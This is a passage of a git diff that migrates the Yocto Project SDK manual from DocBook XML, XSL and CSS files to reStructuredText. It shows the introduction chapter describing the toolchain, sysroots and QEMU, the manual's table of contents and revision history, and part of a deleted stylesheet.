+Yocto Project installed. A developer can independently compile and test
+an object on their machine and then, when the object is ready for
+integration into an image, they can simply make it available to the
+machine that has the Yocto Project. Once the object is available, the
+image can be rebuilt using the Yocto Project to produce the modified
+image.
+
+You just need to follow these general steps:
+
+1. *Install the SDK for your target hardware:* For information on how to
+ install the SDK, see the "`Installing the
+ SDK <#sdk-installing-the-sdk>`__" section.
+
+2. *Download or Build the Target Image:* The Yocto Project supports
+ several target architectures and has many pre-built kernel images and
+ root filesystem images.
+
+ If you are going to develop your application on hardware, go to the
+ :yocto_dl:`machines </releases/yocto/yocto-3.1.2/machines/>` download area and choose a
+ target machine area from which to download the kernel image and root
+ filesystem. This download area could have several files in it that
+ support development using actual hardware. For example, the area
+ might contain ``.hddimg`` files that combine the kernel image with
+ the filesystem, boot loaders, and so forth. Be sure to get the files
+ you need for your particular development process.
+
+ If you are going to develop your application and then run and test it
+ using the QEMU emulator, go to the
+ :yocto_dl:`machines/qemu </releases/yocto/yocto-3.1.2/machines/qemu>` download area. From this
+ area, go down into the directory for your target architecture (e.g.
+ ``qemux86_64`` for an Intel-based 64-bit architecture). Download the
+ kernel, root filesystem, and any other files you need for your
+ process.
+
+ .. note::
+
+ To use the root filesystem in QEMU, you need to extract it. See
+ the "
+ Extracting the Root Filesystem
+ " section for information on how to extract the root filesystem.
+
+3. *Develop and Test your Application:* At this point, you have the
+ tools to develop your application. If you need to separately install
+ and use the QEMU emulator, you can go to `QEMU Home
+ Page <http://wiki.qemu.org/Main_Page>`__ to download and learn about
+ the emulator. See the ":doc:`../dev-manual/dev-manual-qemu`" chapter in the
+ Yocto Project Development Tasks Manual for information on using QEMU
+ within the Yocto Project.
+
+The remainder of this manual describes how to use the extensible and
+standard SDKs. Information also exists in appendix form that describes
+how you can build, install, and modify an SDK.
diff --git a/documentation/sdk-manual/sdk-intro.xml b/documentation/sdk-manual/sdk-intro.xml
deleted file mode 100644
index 9169fe9c05..0000000000
--- a/documentation/sdk-manual/sdk-intro.xml
+++ /dev/null
@@ -1,352 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='sdk-intro'>
-<title>Introduction</title>
-
-<section id='sdk-manual-intro'>
- <title>Introduction</title>
-
- <para>
- Welcome to the Yocto Project Application Development and the
- Extensible Software Development Kit (eSDK) manual.
- This manual provides information that explains how to use both the
- Yocto Project extensible and standard SDKs to develop
- applications and images.
- <note>
- Prior to the 2.0 Release of the Yocto Project, application
- development was primarily accomplished through the use of the
- Application Development Toolkit (ADT) and the availability
- of stand-alone cross-development toolchains and other tools.
- With the 2.1 Release of the Yocto Project, application development
- has transitioned to within a tool-rich extensible SDK and the more
- traditional standard SDK.
- </note>
- </para>
-
- <para>
- All SDKs consist of the following:
- <itemizedlist>
- <listitem><para>
- <emphasis>Cross-Development Toolchain</emphasis>:
- This toolchain contains a compiler, debugger, and various
- miscellaneous tools.
- </para></listitem>
- <listitem><para>
- <emphasis>Libraries, Headers, and Symbols</emphasis>:
- The libraries, headers, and symbols are specific to the image
- (i.e. they match the image).
- </para></listitem>
- <listitem><para>
- <emphasis>Environment Setup Script</emphasis>:
- This <filename>*.sh</filename> file, once run, sets up the
- cross-development environment by defining variables and
- preparing for SDK use.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- Additionally, an extensible SDK has tools that allow you to easily add
- new applications and libraries to an image, modify the source of an
- existing component, test changes on the target hardware, and easily
- integrate an application into the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-system-term'>OpenEmbedded build system</ulink>.
- </para>
-
- <para>
- You can use an SDK to independently develop and test code
- that is destined to run on some target machine.
- SDKs are completely self-contained.
- The binaries are linked against their own copy of
- <filename>libc</filename>, which results in no dependencies
- on the target system.
- To achieve this, the pointer to the dynamic loader is
- configured at install time since that path cannot be dynamically
- altered.
- This is the reason for a wrapper around the
- <filename>populate_sdk</filename> and
- <filename>populate_sdk_ext</filename> archives.
- </para>
-
- <para>
- Another feature for the SDKs is that only one set of cross-compiler
- toolchain binaries are produced for any given architecture.
- This feature takes advantage of the fact that the target hardware can
- be passed to <filename>gcc</filename> as a set of compiler options.
- Those options are set up by the environment script and contained in
- variables such as
- <ulink url='&YOCTO_DOCS_REF_URL;#var-CC'><filename>CC</filename></ulink>
- and
- <ulink url='&YOCTO_DOCS_REF_URL;#var-LD'><filename>LD</filename></ulink>.
- This reduces the space needed for the tools.
- Understand, however, that every target still needs a sysroot because
- those binaries are target-specific.
- </para>
-
- <para>
- The SDK development environment consists of the following:
- <itemizedlist>
- <listitem><para>
- The self-contained SDK, which is an
- architecture-specific cross-toolchain and
- matching sysroots (target and native) all built by the
- OpenEmbedded build system (e.g. the SDK).
- The toolchain and sysroots are based on a
- <ulink url='&YOCTO_DOCS_REF_URL;#metadata'>Metadata</ulink>
- configuration and extensions,
- which allows you to cross-develop on the host machine for the
- target hardware.
- Additionally, the extensible SDK contains the
- <filename>devtool</filename> functionality.
- </para></listitem>
- <listitem><para>
- The Quick EMUlator (QEMU), which lets you simulate
- target hardware.
- QEMU is not literally part of the SDK.
- You must build and include this emulator separately.
- However, QEMU plays an important role in the development
- process that revolves around use of the SDK.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- In summary, the extensible and standard SDK share many features.
- However, the extensible SDK has powerful development tools to help you
- more quickly develop applications.
- Following is a table that summarizes the primary differences between
- the standard and extensible SDK types when considering which to
- build:
- <informaltable frame='none'>
- <tgroup cols='3' align='left' colsep='1' rowsep='1'>
- <colspec colname='c1' colwidth='1*'/>
- <colspec colname='c2' colwidth='1*'/>
- <colspec colname='c3' colwidth='1*'/>
- <thead>
- <row>
- <entry align="left"><emphasis>Feature</emphasis></entry>
- <entry align="left"><emphasis>Standard SDK</emphasis></entry>
- <entry align="left"><emphasis>Extensible SDK</emphasis></entry>
- </row>
- </thead>
- <tbody>
- <row>
- <entry align="left">Toolchain</entry>
- <entry align="left">Yes</entry>
- <entry align="left">Yes*</entry>
- </row>
- <row>
- <entry align="left">Debugger</entry>
- <entry align="left">Yes</entry>
- <entry align="left">Yes*</entry>
- </row>
- <row>
- <entry align="left">Size</entry>
- <entry align="left">100+ MBytes</entry>
- <entry align="left">1+ GBytes (or 300+ MBytes for minimal w/toolchain)</entry>
- </row>
- <row>
- <entry align="left"><filename>devtool</filename></entry>
- <entry align="left">No</entry>
- <entry align="left">Yes</entry>
- </row>
- <row>
- <entry align="left">Build Images</entry>
- <entry align="left">No</entry>
- <entry align="left">Yes</entry>
- </row>
- <row>
- <entry align="left">Updateable</entry>
- <entry align="left">No</entry>
- <entry align="left">Yes</entry>
- </row>
- <row>
- <entry align="left">Managed Sysroot**</entry>
- <entry align="left">No</entry>
- <entry align="left">Yes</entry>
- </row>
- <row>
- <entry align="left">Installed Packages</entry>
- <entry align="left">No***</entry>
- <entry align="left">Yes****</entry>
- </row>
- <row>
- <entry align="left">Construction</entry>
- <entry align="left">Packages</entry>
- <entry align="left">Shared State</entry>
- </row>
- </tbody>
- </tgroup>
- </informaltable>
- <literallayout class='monospaced'>
- * Extensible SDK contains the toolchain and debugger if <ulink url='&YOCTO_DOCS_REF_URL;#var-SDK_EXT_TYPE'><filename>SDK_EXT_TYPE</filename></ulink> is "full" or <ulink url='&YOCTO_DOCS_REF_URL;#var-SDK_INCLUDE_TOOLCHAIN'><filename>SDK_INCLUDE_TOOLCHAIN</filename></ulink> is "1", which is the default.
-
- ** Sysroot is managed through the use of <filename>devtool</filename>. Thus, it is less likely that you will corrupt your SDK sysroot when you try to add additional libraries.
-
- *** You can add runtime package management to the standard SDK but it is not supported by default.
-
- **** You must build and make the shared state available to extensible SDK users for "packages" you want to enable users to install.
- </literallayout>
- </para>
-
- <section id='the-cross-development-toolchain'>
- <title>The Cross-Development Toolchain</title>
-
- <para>
- The
- <ulink url='&YOCTO_DOCS_REF_URL;#cross-development-toolchain'>Cross-Development Toolchain</ulink>
- consists of a cross-compiler, cross-linker, and cross-debugger
- that are used to develop user-space applications for targeted
- hardware.
- Additionally, for an extensible SDK, the toolchain also has
- built-in <filename>devtool</filename> functionality.
- This toolchain is created by running a SDK installer script
- or through a
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>
- that is based on your metadata configuration or extension for
- your targeted device.
- The cross-toolchain works with a matching target sysroot.
- </para>
- </section>
-
- <section id='sysroot'>
- <title>Sysroots</title>
-
- <para>
- The native and target sysroots contain needed headers and libraries
- for generating binaries that run on the target architecture.
- The target sysroot is based on the target root filesystem image
- that is built by the OpenEmbedded build system and uses the same
- metadata configuration used to build the cross-toolchain.
- </para>
- </section>
-
- <section id='the-qemu-emulator'>
- <title>The QEMU Emulator</title>
-
- <para>
- The QEMU emulator allows you to simulate your hardware while
- running your application or image.
- QEMU is not part of the SDK but is made available a number of
- different ways:
- <itemizedlist>
- <listitem><para>
- If you have cloned the <filename>poky</filename> Git
- repository to create a
- <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>
- and you have sourced the environment setup script, QEMU is
- installed and automatically available.
- </para></listitem>
- <listitem><para>
- If you have downloaded a Yocto Project release and unpacked
- it to create a Source Directory and you have sourced the
- environment setup script, QEMU is installed and
- automatically available.
- </para></listitem>
- <listitem><para>
- If you have installed the cross-toolchain tarball and you
- have sourced the toolchain's setup environment script, QEMU
- is also installed and automatically available.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-</section>
-
-<section id='sdk-development-model'>
- <title>SDK Development Model</title>
-
- <para>
- Fundamentally, the SDK fits into the development process as follows:
- <imagedata fileref="figures/sdk-environment.png" align="center" width="6in" depth="5in" scalefit="100" />
- The SDK is installed on any machine and can be used to develop
- applications, images, and kernels.
- An SDK can even be used by a QA Engineer or Release Engineer.
- The fundamental concept is that the machine that has the SDK installed
- does not have to be associated with the machine that has the
- Yocto Project installed.
- A developer can independently compile and test an object on their
- machine and then, when the object is ready for integration into an
- image, they can simply make it available to the machine that has the
- Yocto Project.
- Once the object is available, the image can be rebuilt using the
- Yocto Project to produce the modified image.
- </para>
-
- <para>
- You just need to follow these general steps:
- <orderedlist>
- <listitem><para>
- <emphasis>Install the SDK for your target hardware:</emphasis>
- For information on how to install the SDK, see the
- "<link linkend='sdk-installing-the-sdk'>Installing the SDK</link>"
- section.
- </para></listitem>
- <listitem><para>
- <emphasis>Download or Build the Target Image:</emphasis>
- The Yocto Project supports several target architectures
- and has many pre-built kernel images and root filesystem
- images.</para>
-
- <para>If you are going to develop your application on
- hardware, go to the
- <ulink url='&YOCTO_MACHINES_DL_URL;'><filename>machines</filename></ulink>
- download area and choose a target machine area
- from which to download the kernel image and root filesystem.
- This download area could have several files in it that
- support development using actual hardware.
- For example, the area might contain
- <filename>.hddimg</filename> files that combine the
- kernel image with the filesystem, boot loaders, and
- so forth.
- Be sure to get the files you need for your particular
- development process.</para>
-
- <para>If you are going to develop your application and
- then run and test it using the QEMU emulator, go to the
- <ulink url='&YOCTO_QEMU_DL_URL;'><filename>machines/qemu</filename></ulink>
- download area.
- From this area, go down into the directory for your
- target architecture (e.g. <filename>qemux86_64</filename>
- for an <trademark class='registered'>Intel</trademark>-based
- 64-bit architecture).
- Download the kernel, root filesystem, and any other files you
- need for your process.
- <note>
- To use the root filesystem in QEMU, you need to extract it.
- See the
- "<link linkend='sdk-extracting-the-root-filesystem'>Extracting the Root Filesystem</link>"
- section for information on how to extract the root
- filesystem.
- </note>
- </para></listitem>
- <listitem><para>
- <emphasis>Develop and Test your Application:</emphasis>
- At this point, you have the tools to develop your application.
- If you need to separately install and use the QEMU emulator,
- you can go to
- <ulink url='http://wiki.qemu.org/Main_Page'>QEMU Home Page</ulink>
- to download and learn about the emulator.
- See the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#dev-manual-qemu'>Using the Quick EMUlator (QEMU)</ulink>"
- chapter in the Yocto Project Development Tasks Manual
- for information on using QEMU within the Yocto
- Project.
- </para></listitem>
- </orderedlist>
- </para>
-
- <para>
- The remainder of this manual describes how to use the extensible
- and standard SDKs.
- Information also exists in appendix form that describes how you can
- build, install, and modify an SDK.
- </para>
-</section>
-
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/sdk-manual/sdk-manual-customization.xsl b/documentation/sdk-manual/sdk-manual-customization.xsl
deleted file mode 100644
index efa8a84bbb..0000000000
--- a/documentation/sdk-manual/sdk-manual-customization.xsl
+++ /dev/null
@@ -1,26 +0,0 @@
-<?xml version='1.0'?>
-<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns="http://www.w3.org/1999/xhtml" xmlns:fo="http://www.w3.org/1999/XSL/Format" version="1.0">
-
- <xsl:import href="http://downloads.yoctoproject.org/mirror/docbook-mirror/docbook-xsl-1.76.1/xhtml/docbook.xsl" />
-
-<!--
- <xsl:import href="../template/1.76.1/docbook-xsl-1.76.1/xhtml/docbook.xsl" />
-
- <xsl:import href="http://docbook.sourceforge.net/release/xsl/1.76.1/xhtml/docbook.xsl" />
-
--->
-
- <xsl:include href="../template/permalinks.xsl"/>
- <xsl:include href="../template/section.title.xsl"/>
- <xsl:include href="../template/component.title.xsl"/>
- <xsl:include href="../template/division.title.xsl"/>
- <xsl:include href="../template/formal.object.heading.xsl"/>
-
- <xsl:param name="html.stylesheet" select="'sdk-style.css'" />
- <xsl:param name="chapter.autolabel" select="1" />
- <xsl:param name="appendix.autolabel">A</xsl:param>
- <xsl:param name="section.autolabel" select="1" />
- <xsl:param name="section.label.includes.component.label" select="1" />
- <xsl:param name="generate.id.attributes" select="1" />
-
-</xsl:stylesheet>
diff --git a/documentation/sdk-manual/sdk-manual.rst b/documentation/sdk-manual/sdk-manual.rst
new file mode 100644
index 0000000000..177826edf3
--- /dev/null
+++ b/documentation/sdk-manual/sdk-manual.rst
@@ -0,0 +1,22 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+========================================================================================
+Yocto Project Application Development and the Extensible Software Development Kit (eSDK)
+========================================================================================
+
+|
+
+.. toctree::
+ :caption: Table of Contents
+ :numbered:
+
+ sdk-intro
+ sdk-extensible
+ sdk-using
+ sdk-working-projects
+ sdk-appendix-obtain
+ sdk-appendix-customizing
+ sdk-appendix-customizing-standard
+ history
+
+.. include:: /boilerplate.rst
diff --git a/documentation/sdk-manual/sdk-manual.xml b/documentation/sdk-manual/sdk-manual.xml
deleted file mode 100755
index 1bcc0c853f..0000000000
--- a/documentation/sdk-manual/sdk-manual.xml
+++ /dev/null
@@ -1,178 +0,0 @@
-<!DOCTYPE book PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<book id='sdk-manual' lang='en'
- xmlns:xi="http://www.w3.org/2003/XInclude"
- xmlns="http://docbook.org/ns/docbook"
- >
- <bookinfo>
-
- <mediaobject>
- <imageobject>
- <imagedata fileref='figures/sdk-title.png'
- format='SVG'
- align='left' scalefit='1' width='100%'/>
- </imageobject>
- </mediaobject>
-
- <title>
- Yocto Project Application Development and the Extensible Software Development Kit (eSDK)
- </title>
-
- <authorgroup>
- <author>
- <affiliation>
- <orgname>&ORGNAME;</orgname>
- </affiliation>
- <email>&ORGEMAIL;</email>
- </author>
- </authorgroup>
-
- <revhistory>
- <revision>
- <revnumber>2.1</revnumber>
- <date>April 2016</date>
- <revremark>The initial document released with the Yocto Project 2.1 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.2</revnumber>
- <date>October 2016</date>
- <revremark>Released with the Yocto Project 2.2 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.3</revnumber>
- <date>May 2017</date>
- <revremark>Released with the Yocto Project 2.3 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.4</revnumber>
- <date>October 2017</date>
- <revremark>Released with the Yocto Project 2.4 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.5</revnumber>
- <date>May 2018</date>
- <revremark>Released with the Yocto Project 2.5 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.6</revnumber>
- <date>November 2018</date>
- <revremark>Released with the Yocto Project 2.6 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.7</revnumber>
- <date>May 2019</date>
- <revremark>Released with the Yocto Project 2.7 Release.</revremark>
- </revision>
- <revision>
- <revnumber>3.0</revnumber>
- <date>October 2019</date>
- <revremark>Released with the Yocto Project 3.0 Release.</revremark>
- </revision>
- <revision>
- <revnumber>3.1</revnumber>
- <date>April 2020</date>
- <revremark>Released with the Yocto Project 3.1 Release.</revremark>
- </revision>
- <revision>
- <revnumber>3.1.1</revnumber>
- <date>June 2020</date>
- <revremark>Released with the Yocto Project 3.1.1 Release.</revremark>
- </revision>
- <revision>
- <revnumber>3.1.2</revnumber>
- <date>August 2020</date>
- <revremark>Released with the Yocto Project 3.1.2 Release.</revremark>
- </revision>
- <revision>
- <revnumber>3.1.3</revnumber>
- <date>October 2020</date>
- <revremark>Released with the Yocto Project 3.1.3 Release.</revremark>
- </revision>
- <revision>
- <revnumber>3.1.4</revnumber>
- <date>&REL_MONTH_YEAR;</date>
- <revremark>Released with the Yocto Project 3.1.4 Release.</revremark>
- </revision>
- </revhistory>
-
- <copyright>
- <year>&COPYRIGHT_YEAR;</year>
- <holder>Linux Foundation</holder>
- </copyright>
-
- <legalnotice>
- <para>
- Permission is granted to copy, distribute and/or modify this document under
- the terms of the <ulink type="http" url="http://creativecommons.org/licenses/by-sa/2.0/uk/">Creative Commons Attribution-Share Alike 2.0 UK: England &amp; Wales</ulink> as published by Creative Commons.
- </para>
- <note><title>Manual Notes</title>
- <itemizedlist>
- <listitem><para>
- This version of the
- <emphasis>Yocto Project Application Development and the Extensible Software Development Kit (eSDK)</emphasis>
- manual is for the &YOCTO_DOC_VERSION; release of the
- Yocto Project.
- To be sure you have the latest version of the manual
- for this release, go to the
- <ulink url='&YOCTO_DOCS_URL;'>Yocto Project documentation page</ulink>
- and select the manual from that site.
- Manuals from the site are more up-to-date than manuals
- derived from the Yocto Project released TAR files.
- </para></listitem>
- <listitem><para>
- If you located this manual through a web search, the
- version of the manual might not be the one you want
- (e.g. the search might have returned a manual much
- older than the Yocto Project version with which you
- are working).
- You can see all Yocto Project major releases by
- visiting the
- <ulink url='&YOCTO_WIKI_URL;/wiki/Releases'>Releases</ulink>
- page.
- If you need a version of this manual for a different
- Yocto Project release, visit the
- <ulink url='&YOCTO_DOCS_URL;'>Yocto Project documentation page</ulink>
- and select the manual set by using the
- "ACTIVE RELEASES DOCUMENTATION" or "DOCUMENTS ARCHIVE"
- pull-down menus.
- </para></listitem>
- <listitem>
- <para>
- To report any inaccuracies or problems with this
- (or any other Yocto Project) manual, send an email to
- the Yocto Project documentation mailing list at
- <filename>docs@lists.yoctoproject.org</filename> or
- log into the freenode <filename>#yocto</filename> channel.
- </para>
- </listitem>
- </itemizedlist>
- </note>
- </legalnotice>
-
- </bookinfo>
-
- <xi:include href="sdk-intro.xml"/>
-
- <xi:include href="sdk-extensible.xml"/>
-
- <xi:include href="sdk-using.xml"/>
-
- <xi:include href="sdk-working-projects.xml"/>
-
- <xi:include href="sdk-appendix-obtain.xml"/>
-
- <xi:include href="sdk-appendix-customizing.xml"/>
-
- <xi:include href="sdk-appendix-customizing-standard.xml"/>
-
-<!-- <index id='index'>
- <title>Index</title>
- </index>
--->
-
-</book>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/sdk-manual/sdk-style.css b/documentation/sdk-manual/sdk-style.css
deleted file mode 100644
index 52518964ca..0000000000
--- a/documentation/sdk-manual/sdk-style.css
+++ /dev/null
@@ -1,988 +0,0 @@
-/*
- Generic XHTML / DocBook XHTML CSS Stylesheet.
-
- Browser wrangling and typographic design by
- Oyvind Kolas / pippin@gimp.org
-
- Customised for Poky by
- Matthew Allum / mallum@o-hand.com
-
- Thanks to:
- Liam R. E. Quin
- William Skaggs
- Jakub Steiner
-
- Structure
- ---------
-
- The stylesheet is divided into the following sections:
-
- Positioning
- Margins, paddings, width, font-size, clearing.
- Decorations
- Borders, style
- Colors
- Colors
- Graphics
- Graphical backgrounds
- Nasty IE tweaks
- Workarounds needed to make it work in internet explorer,
- currently makes the stylesheet non validating, but up until
- this point it is validating.
- Mozilla extensions
- Transparency for footer
- Rounded corners on boxes
-
-*/
-
-
- /*************** /
- / Positioning /
-/ ***************/
-
-body {
- font-family: Verdana, Sans, sans-serif;
-
- min-width: 640px;
- width: 80%;
- margin: 0em auto;
- padding: 2em 5em 5em 5em;
- color: #333;
-}
-
-h1,h2,h3,h4,h5,h6,h7 {
- font-family: Arial, Sans;
- color: #00557D;
- clear: both;
-}
-
-h1 {
- font-size: 2em;
- text-align: left;
- padding: 0em 0em 0em 0em;
- margin: 2em 0em 0em 0em;
-}
-
-h2.subtitle {
- margin: 0.10em 0em 3.0em 0em;
- padding: 0em 0em 0em 0em;
- font-size: 1.8em;
- padding-left: 20%;
- font-weight: normal;
- font-style: italic;
-}
-
-h2 {
- margin: 2em 0em 0.66em 0em;
- padding: 0.5em 0em 0em 0em;
- font-size: 1.5em;
- font-weight: bold;
-}
-
-h3.subtitle {
- margin: 0em 0em 1em 0em;
- padding: 0em 0em 0em 0em;
- font-size: 142.14%;
- text-align: right;
-}
-
-h3 {
- margin: 1em 0em 0.5em 0em;
- padding: 1em 0em 0em 0em;
- font-size: 140%;
- font-weight: bold;
-}
-
-h4 {
- margin: 1em 0em 0.5em 0em;
- padding: 1em 0em 0em 0em;
- font-size: 120%;
- font-weight: bold;
-}
-
-h5 {
- margin: 1em 0em 0.5em 0em;
- padding: 1em 0em 0em 0em;
- font-size: 110%;
- font-weight: bold;
-}
-
-h6 {
- margin: 1em 0em 0em 0em;
- padding: 1em 0em 0em 0em;
- font-size: 110%;
- font-weight: bold;
-}
-
-.authorgroup {
- background-color: transparent;
- background-repeat: no-repeat;
- padding-top: 256px;
- background-image: url("figures/sdk-title.png");
- background-position: left top;
- margin-top: -256px;
- padding-right: 50px;
- margin-left: 0px;
- text-align: right;
- width: 740px;
-}
-
-h3.author {
- margin: 0em 0me 0em 0em;
- padding: 0em 0em 0em 0em;
- font-weight: normal;
- font-size: 100%;
- color: #333;
- clear: both;
-}
-
-.author tt.email {
- font-size: 66%;
-}
-
-.titlepage hr {
- width: 0em;
- clear: both;
-}
-
-.revhistory {
- padding-top: 2em;
- clear: both;
-}
-
-.toc,
-.list-of-tables,
-.list-of-examples,
-.list-of-figures {
- padding: 1.33em 0em 2.5em 0em;
- color: #00557D;
-}
-
-.toc p,
-.list-of-tables p,
-.list-of-figures p,
-.list-of-examples p {
- padding: 0em 0em 0em 0em;
- padding: 0em 0em 0.3em;
- margin: 1.5em 0em 0em 0em;
-}
-
-.toc p b,
-.list-of-tables p b,
-.list-of-figures p b,
-.list-of-examples p b{
- font-size: 100.0%;
- font-weight: bold;
-}
-
-.toc dl,
-.list-of-tables dl,
-.list-of-figures dl,
-.list-of-examples dl {
- margin: 0em 0em 0.5em 0em;
- padding: 0em 0em 0em 0em;
-}
-
-.toc dt {
- margin: 0em 0em 0em 0em;
- padding: 0em 0em 0em 0em;
-}
-
-.toc dd {
- margin: 0em 0em 0em 2.6em;
- padding: 0em 0em 0em 0em;
-}
-
-div.glossary dl,
-div.variablelist dl {
-}
-
-.glossary dl dt,
-.variablelist dl dt,
-.variablelist dl dt span.term {
- font-weight: normal;
- width: 20em;
- text-align: right;
-}
-
-.variablelist dl dt {
- margin-top: 0.5em;
-}
-
-.glossary dl dd,
-.variablelist dl dd {
- margin-top: -1em;
- margin-left: 25.5em;
-}
-
-.glossary dd p,
-.variablelist dd p {
- margin-top: 0em;
- margin-bottom: 1em;
-}
-
-
-div.calloutlist table td {
- padding: 0em 0em 0em 0em;
- margin: 0em 0em 0em 0em;
-}
-
-div.calloutlist table td p {
- margin-top: 0em;
- margin-bottom: 1em;
-}
-
-div p.copyright {
- text-align: left;
-}
-
-div.legalnotice p.legalnotice-title {
- margin-bottom: 0em;
-}
-
-p {
- line-height: 1.5em;
- margin-top: 0em;
-
-}
-
-dl {
- padding-top: 0em;
-}
-
-hr {
- border: solid 1px;
-}
-
-
-.mediaobject,
-.mediaobjectco {
- text-align: center;
-}
-
-img {
- border: none;
-}
-
-ul {
- padding: 0em 0em 0em 1.5em;
-}
-
-ul li {
- padding: 0em 0em 0em 0em;
-}
-
-ul li p {
- text-align: left;
-}
-
-table {
- width :100%;
-}
-
-th {
- padding: 0.25em;
- text-align: left;
- font-weight: normal;
- vertical-align: top;
-}
-
-td {
- padding: 0.25em;
- vertical-align: top;
-}
-
-p a[id] {
- margin: 0px;
- padding: 0px;
- display: inline;
- background-image: none;
-}
-
-a {
- text-decoration: underline;
- color: #444;
-}
-
-pre {
- overflow: auto;
-}
-
-a:hover {
- text-decoration: underline;
- /*font-weight: bold;*/
-}
-
-/* This style defines how the permalink character
- appears by itself and when hovered over with
- the mouse. */
-
-[alt='Permalink'] { color: #eee; }
-[alt='Permalink']:hover { color: black; }
-
-
-div.informalfigure,
-div.informalexample,
-div.informaltable,
-div.figure,
-div.table,
-div.example {
- margin: 1em 0em;
- padding: 1em;
- page-break-inside: avoid;
-}
-
-
-div.informalfigure p.title b,
-div.informalexample p.title b,
-div.informaltable p.title b,
-div.figure p.title b,
-div.example p.title b,
-div.table p.title b{
- padding-top: 0em;
- margin-top: 0em;
- font-size: 100%;
- font-weight: normal;
-}
-
-.mediaobject .caption,
-.mediaobject .caption p {
- text-align: center;
- font-size: 80%;
- padding-top: 0.5em;
- padding-bottom: 0.5em;
-}
-
-.epigraph {
- padding-left: 55%;
- margin-bottom: 1em;
-}
-
-.epigraph p {
- text-align: left;
-}
-
-.epigraph .quote {
- font-style: italic;
-}
-.epigraph .attribution {
- font-style: normal;
- text-align: right;
-}
-
-span.application {
- font-style: italic;
-}
-
-.programlisting {
- font-family: monospace;
- font-size: 80%;
- white-space: pre;
- margin: 1.33em 0em;
- padding: 1.33em;
-}
-
-.tip,
-.warning,
-.caution,
-.note {
- margin-top: 1em;
- margin-bottom: 1em;
-
-}
-
-/* force full width of table within div */
-.tip table,
-.warning table,
-.caution table,
-.note table {
- border: none;
- width: 100%;
-}
-
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
- padding: 0.8em 0.0em 0.0em 0.0em;
- margin : 0em 0em 0em 0em;
-}
-
-.tip p,
-.warning p,
-.caution p,
-.note p {
- margin-top: 0.5em;
- margin-bottom: 0.5em;
- padding-right: 1em;
- text-align: left;
-}
-
-.acronym {
- text-transform: uppercase;
-}
-
-b.keycap,
-.keycap {
- padding: 0.09em 0.3em;
- margin: 0em;
-}
-
-.itemizedlist li {
- clear: none;
-}
-
-.filename {
- font-size: medium;
- font-family: Courier, monospace;
-}
-
-
-div.navheader, div.heading{
- position: absolute;
- left: 0em;
- top: 0em;
- width: 100%;
- background-color: #cdf;
- width: 100%;
-}
-
-div.navfooter, div.footing{
- position: fixed;
- left: 0em;
- bottom: 0em;
- background-color: #eee;
- width: 100%;
-}
-
-
-div.navheader td,
-div.navfooter td {
- font-size: 66%;
-}
-
-div.navheader table th {
- /*font-family: Georgia, Times, serif;*/
- /*font-size: x-large;*/
- font-size: 80%;
-}
-
-div.navheader table {
- border-left: 0em;
- border-right: 0em;
- border-top: 0em;
- width: 100%;
-}
-
-div.navfooter table {
- border-left: 0em;
- border-right: 0em;
- border-bottom: 0em;
- width: 100%;
-}
-
-div.navheader table td a,
-div.navfooter table td a {
- color: #777;
- text-decoration: none;
-}
-
-/* normal text in the footer */
-div.navfooter table td {
- color: black;
-}
-
-div.navheader table td a:visited,
-div.navfooter table td a:visited {
- color: #444;
-}
-
-
-/* links in header and footer */
-div.navheader table td a:hover,
-div.navfooter table td a:hover {
- text-decoration: underline;
- background-color: transparent;
- color: #33a;
-}
-
-div.navheader hr,
-div.navfooter hr {
- display: none;
-}
-
-
-.qandaset tr.question td p {
- margin: 0em 0em 1em 0em;
- padding: 0em 0em 0em 0em;
-}
-
-.qandaset tr.answer td p {
- margin: 0em 0em 1em 0em;
- padding: 0em 0em 0em 0em;
-}
-.answer td {
- padding-bottom: 1.5em;
-}
-
-.emphasis {
- font-weight: bold;
-}
-
-
- /************* /
- / decorations /
-/ *************/
-
-.titlepage {
-}
-
-.part .title {
-}
-
-.subtitle {
- border: none;
-}
-
-/*
-h1 {
- border: none;
-}
-
-h2 {
- border-top: solid 0.2em;
- border-bottom: solid 0.06em;
-}
-
-h3 {
- border-top: 0em;
- border-bottom: solid 0.06em;
-}
-
-h4 {
- border: 0em;
- border-bottom: solid 0.06em;
-}
-
-h5 {
- border: 0em;
-}
-*/
-
-.programlisting {
- border: solid 1px;
-}
-
-div.figure,
-div.table,
-div.informalfigure,
-div.informaltable,
-div.informalexample,
-div.example {
- border: 1px solid;
-}
-
-
-
-.tip,
-.warning,
-.caution,
-.note {
- border: 1px solid;
-}
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
- border-bottom: 1px solid;
-}
-
-.question td {
- border-top: 1px solid black;
-}
-
-.answer {
-}
-
-
-b.keycap,
-.keycap {
- border: 1px solid;
-}
-
-
-div.navheader, div.heading{
- border-bottom: 1px solid;
-}
-
-
-div.navfooter, div.footing{
- border-top: 1px solid;
-}
-
- /********* /
- / colors /
-/ *********/
-
-body {
- color: #333;
- background: white;
-}
-
-a {
- background: transparent;
-}
-
-a:hover {
- background-color: #dedede;
-}
-
-
-h1,
-h2,
-h3,
-h4,
-h5,
-h6,
